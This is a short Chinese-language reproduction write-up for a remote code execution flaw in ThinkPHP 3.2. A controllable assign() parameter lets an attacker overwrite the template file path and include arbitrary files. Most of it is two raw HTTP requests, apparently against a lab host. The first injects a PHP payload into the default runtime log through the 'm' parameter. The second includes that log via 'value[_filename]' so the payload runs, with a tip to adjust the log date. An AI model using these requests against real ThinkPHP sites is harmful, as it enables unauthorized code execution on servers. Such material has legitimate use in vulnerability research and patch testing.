描述
ThinkPHP3.2的远程代码执行漏洞。该漏洞是在受影响的版本中,业务代码中如果模板赋值方法assign的第一个参数可控,则可导致模板文件路径变量被覆盖为携带攻击代码的文件路径,造成任意文件包含,执行任意代码。
复现
1.在默认的日志路径中包含执行PHP代码,数据包如下:
GET /index.php?m=--><?=phpinfo();?> HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1
2./index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log
22_10_01是复现的日期,根据自己的时间做调整
GET /index.php?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Common/22_10_01.log HTTP/1.1
Host: 123.58.224.8:60413
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: Hm_lvt_deaeca6802357287fb453f342ce28dda=1661606197,1663322124; csrf_2698a4=b425a1c9; _ga=GA1.1.2104325447.1662173640; s7t_visitedfid=2; BOg8_2132_saltkey=QzYq2Yi9; BOg8_2132_lastvisit=1663245404; _xsrf=2|acaadd94|c0a162aa3fd2e931e6cd588feb40d74a|1664445801; PHPSESSID=ckges7c8h7lhanhuea3ppd1o40
Upgrade-Insecure-Requests: 1